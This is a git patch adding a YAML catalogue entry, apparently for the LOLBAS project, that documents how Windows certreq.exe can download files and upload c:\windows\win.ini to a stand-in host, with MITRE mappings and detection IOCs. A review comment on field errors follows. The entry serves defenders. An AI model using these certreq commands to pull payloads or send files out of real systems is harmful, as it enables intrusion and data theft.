From aa88bf814468b9cbb8be7a51d629364ce14403b6 Mon Sep 17 00:00:00 2001 From: "@dtmsecurity" Date: Tue, 7 Jul 2020 21:09:06 +0100 Subject: [PATCH] Create certreq.yml --- yml/OSBinaries/certreq.yml | 36 ++++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 yml/OSBinaries/certreq.yml diff --git a/yml/OSBinaries/certreq.yml b/yml/OSBinaries/certreq.yml new file mode 100644 index 0000000..b02f001 --- /dev/null +++ b/yml/OSBinaries/certreq.yml @@ -0,0 +1,36 @@ +--- +Name: CertReq.exe +Description: Used for requesting and managing certificates +Author: 'David Middlehurst' +Created: '2020-07-07' +Commands: + - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt + Description: Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory + Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini and show response in terminal + Description: Send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST + Usecase: Upload + Category: Upload + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +Full_Path: + - Path: C:\Windows\System32\certreq.exe + - Path: C:\Windows\SysWOW64\certreq.exe +Code_Sample: + - Code: +Detection: + - IOC: certreq creates new files + - IOC: certreq makes POST requests +Resources: + - Link: https://dtm.uk/certreq +Acknowledgement: + - Person: David Middlehurst + Handle: '@dtmsecurity' +--- \ No newline at end of file
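Review bot: In the second `Commands` entry, the `Command` value ends with the prose "and show response in terminal", which is not part of the command line and will mislead anyone copying the field into a detection rule or test. Keep the field to `CertReq -Post -config https://example.org/ c:\windows\win.ini` and move the remark about the response being shown in the terminal into `Description`. The same entry is categorised as `Upload` but reuses `MitreID: T1105` from the download entry, so it is worth confirming that this is the intended mapping for sending a local file outbound. `Code_Sample` carries an empty `- Code:` item, which should either be filled or dropped. The two `Detection` IOCs ("certreq creates new files", "certreq makes POST requests") would be more actionable if they named the observable on the page, for example a `certreq.exe` command line containing `-Post` together with `-config` and a URL. Finally, the file ends with a second `---` and no trailing newline, and `Windows vista` is cased differently from the other `OperatingSystem` values.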